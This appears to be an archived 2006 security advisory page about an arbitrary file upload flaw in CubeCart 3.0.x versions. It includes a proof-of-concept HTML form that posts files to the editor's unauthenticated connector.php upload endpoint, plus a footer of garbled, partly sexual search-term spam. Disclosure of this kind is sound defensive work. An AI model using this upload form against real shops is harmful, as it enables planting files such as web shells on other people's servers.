about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , CubeCart Arbitrary File Upload Vulnerability


Title CubeCart Arbitrary File Upload Vulnerability
Published 2006-02-23-12:00AM
Updated 2006-02-24-07:02PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  NSA Group is credited with the discovery of this vulnerability.
Vulnerable  CubeCart CubeCart 3.0.7 pl1
CubeCart CubeCart 3.0.6
CubeCart CubeCart 3.0.4
CubeCart CubeCart 3.0.3
Not Vulnerable  CubeCart CubeCart 3.0.7
Code   This issue can be exploited with a web client.

The following proof of concept is available:
<form action="http://www.example.com/cubedir/admin/includes/rte/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFol
der=/"
method="POST" enctype="multipart/form-data">
File Upload<br>
<input id="txtFileUpload" type="file" name="NewFile">
<br>
<input type="submit" value="Upload">
</form>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 01:08:56 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
FUCK VIDIO phpkb mambo Remo /viewscree 200 /compo Hinhanh.co sexy tamil aishwary NOD32 news for C sixey girl ggw debian loc wwww.skf-f all cartoo CMS is Fre www.taoing CuteNews 1 main.inc.p Www.c700.c lo103l www.wt.com hot sexy n news for C www.indian sexystill www.trish www.yimish TeamSpeak boy fuck i Apache-Co WWW.TAOTAO www.jhyb.c Arab6 mastrobati Www.Indian shan www.rdgcw. www.lauraa news for c mambo Remo www.cn-pcx lalatsex Bollywoods www.xxxl Freesexvdi Www.Sexygi ghflshkang CMS is Fre gongn.cn